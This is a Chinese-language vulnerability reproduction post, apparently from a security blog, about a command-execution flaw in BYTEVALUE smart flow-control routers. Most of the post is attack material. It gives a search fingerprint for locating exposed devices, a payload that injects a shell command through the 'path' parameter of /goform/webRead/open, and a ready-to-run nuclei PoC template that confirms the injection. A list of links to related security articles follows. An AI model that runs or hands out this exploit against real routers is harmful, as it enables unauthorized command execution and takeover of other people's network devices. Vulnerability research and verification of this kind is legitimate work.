【漏洞复现】BYTEVALUE智能流控路由器存在命令执行

【漏洞介绍】

百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。

【指纹】

title="BYTEVALUE 智能流控路由器"

【UI】

【payload】

/goform/webRead/open/?path=|whoami

【Poc】

id: BYTEVALUE-Rce
info:
  name: BYTEVALUE-Rce
  author: BYTEVALUE-Rce
  severity: critical
  tags: BYTEVALUE

http:
  - raw:
    - |
        GET /goform/webRead/open/?path=|whoami HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "admin"
      - type: status
        status:
          - 200

【使用nuclei复现】

相关推荐
jingwang-cs21 分钟前
内外网文件传输 安全、可控、便捷的跨网数据传输方案
人工智能·后端·安全
网安Ruler30 分钟前
靶场之路-Kioptix Level-1 mod_ssl 缓冲区溢出漏洞
网络·网络协议·网络安全·ssl
Hacker_Nightrain3 小时前
内网网络安全的解决之道
安全·web安全·php
Dawndddddd3 小时前
网络安全之攻防笔记--通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2
笔记·sql·安全·web安全
Werqy34 小时前
burpsuite保姆级安装教程
网络安全
竹言笙熙15 小时前
代码审计初探
学习·web安全
AI服务老曹16 小时前
运用先进的智能算法和优化模型,进行科学合理调度的智慧园区开源了
运维·人工智能·安全·开源·音视频
网络安全King17 小时前
华为 网络安全 认证
安全·web安全
网络安全-老纪18 小时前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
API_technology18 小时前
电商API安全防护:JWT令牌与XSS防御实战
前端·安全·xss